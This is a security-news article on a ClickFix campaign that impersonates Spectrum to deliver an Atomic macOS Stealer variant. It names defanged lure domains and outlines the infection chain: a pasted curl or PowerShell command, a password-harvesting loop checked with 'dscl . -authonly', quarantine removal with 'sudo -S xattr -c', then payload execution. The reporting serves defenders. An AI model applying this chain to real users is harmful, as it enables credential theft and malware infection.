Atomic Stealer Variant Targets macOS Users via ClickFix‍

A campaign leveraging the ClickFix technique has been observed distributing a variant of the Atomic macOS Stealer (AMOS), with CloudSEK attributing the operation to Russian-speaking cybercriminals. The campaign impersonates Spectrum, a U.S. telecommunications provider, using domains like panel-spectrum[.]net and spectrum-ticket[.]net to trick users into believing they are interacting with the official Spectrum platform. These domains act as delivery mechanisms for the malicious payloads, targeting macOS users through fake verification flows. The delivery infrastructure contained Russian-language comments in the source code, which, along with other behavioral indicators, led CloudSEK to assess a high likelihood of involvement from Russian-speaking threat actors. This aligns with a broader trend of AMOS variants being utilized in social engineering campaigns tailored to platform-specific delivery methods.

The infection process begins with the familiar user prompt to complete a CAPTCHA verification, which, instead of a standard check, provides a command to copy and execute via terminal. A check on the user-agent is conducted to validate the victim’s platform, as Windows workstations receive a PowerShell command for download using "Invoke-WebRequest". For macOS users, the command uses Bash and curl to silently retrieve a shell script to conduct credential harvesting and setup for a second-stage payload. Execution of the downloaded "install.sh" script retrieves the active user context using "whoami", ensuring the password prompt is aligned with the logged-in user. It enters a loop prompting for system credentials, verifying them in real time against macOS directory services via the "dscl . -authonly" method.

Once the correct password is acquired, the script silently downloads an additional binary, disables macOS's extended file attribute protections using "sudo -S xattr -c", and changes its permissions via "chmod +x" before executing it. This binary, according to CloudSEK, is a variant of AMOS. CloudSEK’s analysis revealed operational errors in the campaign’s infrastructure, such as mismatched instructions across different operating systems and incorrect command prompts for Linux users. Despite this sloppiness, the campaign remains effective in targeting macOS users with a tailored infection path.

The theft of user credentials can provide access to sensitive internal resources, increase the risk of lateral movement within organizations, and facilitate access for further exploitation or resale in underground markets. CloudSEK warns that such multi-platform phishing campaigns represent a growing threat to both consumers and enterprises alike.